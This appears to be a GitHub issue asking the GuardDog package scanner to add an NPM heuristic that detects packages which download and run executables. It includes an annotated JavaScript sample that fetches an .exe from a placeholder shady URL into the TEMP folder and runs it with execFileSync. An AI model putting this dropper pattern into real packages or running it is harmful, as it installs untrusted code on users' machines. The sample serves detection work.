guarddog
Missing NPM heuristic: download-executable
A similar heuristic exists for PyPI, but there is no equivalent for NPM:
Sample:
// Sample input for the requested heuristic. The snippet as posted does not
// show where `path`, `fs`, `http` or `execFileSync` come from, so a rule
// cannot rely on seeing the matching require()/import lines next to the calls.

// Signal: a hard-coded remote URL whose path ends in an executable
// extension (.exe), fetched over plain http.
const Link = "http://someshadyurl.com/node_manager.exe";
// Signal: the destination is an .exe file name placed under the directory
// named by the TEMP environment variable.
const FinalPath = path.join(process.env.TEMP, "test.exe")
/**
 * Entry point of the sample: fetches the remote file to FinalPath, then
 * executes that same path.
 *
 * The pairing of a download-to-disk call with an exec call on the written
 * path is the behaviour the download-executable heuristic is meant to flag.
 * Nothing in the lines shown actually calls main().
 */
async function main(){
  // Resolves once the write stream in download() emits "finish".
  await download(Link, FinalPath)
  // NOTE(review): presumably child_process.execFileSync (import not shown).
  // That call is synchronous, so the `await` changes nothing; a detection
  // rule should match the call with or without it.
  await execFileSync(FinalPath)
}
/**
 * Streams the body of an HTTP GET response into a newly created file.
 *
 * Detection-relevant flow: http.get(url) -> response.pipe(writeStream(dest)).
 * The response is written to disk as-is; the code shown performs no check of
 * content type, size or integrity, and only a 200 status is accepted.
 *
 * @param {string} url - Address passed to http.get.
 * @param {string} dest - Path of the file to create; must not already exist.
 * @returns {Promise<void>} Resolves when the write stream finishes. Rejects
 *   with a string (not an Error) on a non-200 status, a request error or a
 *   file error.
 */
function download(url, dest) {
  return new Promise((resolve, reject) => {
    // "wx" opens for writing and fails with EEXIST if dest already exists
    // (handled in the file "error" listener below).
    const file = fs.createWriteStream(dest, { flags: "wx" });
    const request = http.get(url, response => {
      if (response.statusCode === 200) {
        // Response body goes straight to the file on disk.
        response.pipe(file);
      } else {
        // Any other status, redirects included, is treated as failure.
        file.close();
        fs.unlink(dest, () => {}); // Delete temp file
        reject(`Server responded with ${response.statusCode}: ${response.statusMessage}`);
      }
    });
    // Request-level failure: remove the partial file.
    request.on("error", err => {
      file.close();
      fs.unlink(dest, () => {}); // Delete temp file
      reject(err.message);
    });
    // The promise settles successfully only after the stream has finished.
    file.on("finish", () => {
      resolve();
    });
    file.on("error", err => {
      file.close();
      if (err.code === "EEXIST") {
        // The pre-existing file is not this call's to delete, so no unlink here.
        reject("File already exists");
      } else {
        fs.unlink(dest, () => {}); // Delete temp file
        reject(err.message);
      }
    });
  });
}